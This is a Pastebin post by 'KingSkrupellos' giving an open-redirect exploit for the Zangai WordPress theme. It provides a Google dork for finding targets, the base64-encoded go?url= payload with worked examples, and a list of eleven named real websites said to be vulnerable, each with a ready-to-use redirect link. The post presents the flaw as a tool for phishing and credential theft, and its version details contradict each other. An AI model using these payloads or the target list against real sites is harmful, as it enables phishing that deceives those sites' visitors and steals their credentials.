Advertisement
KingSkrupellos

WordPress 5.0.4 Zangai Themes Open Redirection

Mar 14th, 2019
129
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.23 KB | None | 0 0
  1. ############################################################################################
  2.  
  3. # Exploit Title : WordPress 5.0.4 Zangai Themes Open Redirection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 15/03/2019
  7. # Vendor Homepage : wpmee.cn ~ wordpress.org
  8. # Software Information Link :
  9. joytheme.com/theme/zangai-2/
  10. wpmee.cn/theme/zangai-2.html
  11. # Software Affected Version : 5.0.3
  12. # Tested On : Windows and Linux
  13. # Category : WebApps
  14. # Exploit Risk : High
  15. # Google Dorks : inurl:"/wp-content/themes/zangai/"
  16. # Vulnerability Type : CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
  17. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  18. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  19. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  20.  
  21. ############################################################################################
  22. # Impact :
  23. ***********
  24. This web application WordPress Zangai Themes accepts a user-controlled input that specifies a link to an external site,
  25.  
  26. and uses that link in a Redirect. This simplifies phishing attacks. An http parameter may contain a URL value and
  27.  
  28. could cause the web application to redirect the request to the specified URL. By modifying the URL value to a
  29.  
  30. malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name
  31.  
  32. in the modified link is identical to the original site, phishing attempts have a more trustworthy appearance.
  33.  
  34. Open redirect is a failure in that process that makes it possible for attackers to steer users to malicious websites.
  35.  
  36. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it. Web users often
  37.  
  38. encounter redirection when they visit the Web site of a company whose name has been changed or which has been
  39.  
  40. acquired by another company. Visiting unreal web page user's computer becomes affected by malware the task of
  41.  
  42. which is to deceive the valid actor and steal his personal data.
  43.  
  44. ############################################################################################
  45.  
  46. # Vulnerable File : go.php
  47. ***************
  48. # Vulnerable Parameter : go?url=
  49. *********************
  50. # Open Redirection Exploit :
  51. **********************
  52. /wp-content/themes/zangai/go?url=[BASE64 Encoded URL]
  53.  
  54. /wp-content/themes/zangai/go?url=aHR0cHM6Ly9jeHNlY3VyaXR5LmNvbS8=
  55.  
  56. Note : Convert any random desired redirection address into the Base64 Encoded Link.
  57.  
  58. Example 1 => aHR0cHM6Ly9jeHNlY3VyaXR5LmNvbS8= stands for cxsecurity.com
  59.  
  60. Example 2 => aHR0cHM6Ly93d3cuY3liZXJpem0ub3JnLw== stands for cyberizm.org
  61.  
  62. Example 3 => aHR0cDovL2V4cGxvaXQ0YXJhYi5vcmcv stands for exploit4arab.org
  63.  
  64. Example 4 => aHR0cHM6Ly9wYWNrZXRzdG9ybXNlY3VyaXR5LmNvbS8= stands for packetstormsecurity.com
  65.  
  66. Useable Base64 Encoder - Decoder Links :
  67. base64decode.org
  68. base64encode.org
  69.  
  70. ############################################################################################
  71.  
  72. # Example Vulnerable Sites :
  73. *************************
  74. [+] uidora.com/wp-content/themes/zangai/go/?url=aHR0cHM6Ly9jeHNlY3VyaXR5LmNvbS8=
  75.  
  76. [+] ecurls.com/wp-content/themes/zangai/go?url=aHR0cHM6Ly9jeHNlY3VyaXR5LmNvbS8=
  77.  
  78. [+] 51sol.cn/wp-content/themes/zangai/go?url=aHR0cHM6Ly9jeHNlY3VyaXR5LmNvbS8=
  79.  
  80. [+] 12371.net/wp-content/themes/zangai/go/?url=aHR0cHM6Ly9jeHNlY3VyaXR5LmNvbS8=
  81.  
  82. [+] web.jimaie.com/wp-content/themes/zangai/go/?url=aHR0cHM6Ly9jeHNlY3VyaXR5LmNvbS8=
  83.  
  84. [+] record-we.com/wp-content/themes/zangai/go/?url=aHR0cHM6Ly9jeHNlY3VyaXR5LmNvbS8=
  85.  
  86. [+] nav.zhang.sb/wp-content/themes/zangai/go/?url=aHR0cHM6Ly9jeHNlY3VyaXR5LmNvbS8=
  87.  
  88. [+] xmt.wuhanqby.com/wp-content/themes/zangai/go/?url=aHR0cHM6Ly9jeHNlY3VyaXR5LmNvbS8=
  89.  
  90. [+] syw1.com/wp-content/themes/zangai/go/?url=aHR0cHM6Ly9jeHNlY3VyaXR5LmNvbS8=
  91.  
  92. [+] nani.online/wp-content/themes/zangai/go/?url=aHR0cHM6Ly9jeHNlY3VyaXR5LmNvbS8=
  93.  
  94. [+] enuvc.com/wp-content/themes/zangai/go/?url=aHR0cHM6Ly9jeHNlY3VyaXR5LmNvbS8=
  95.  
  96. ############################################################################################
  97.  
  98. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  99.  
  100. ############################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement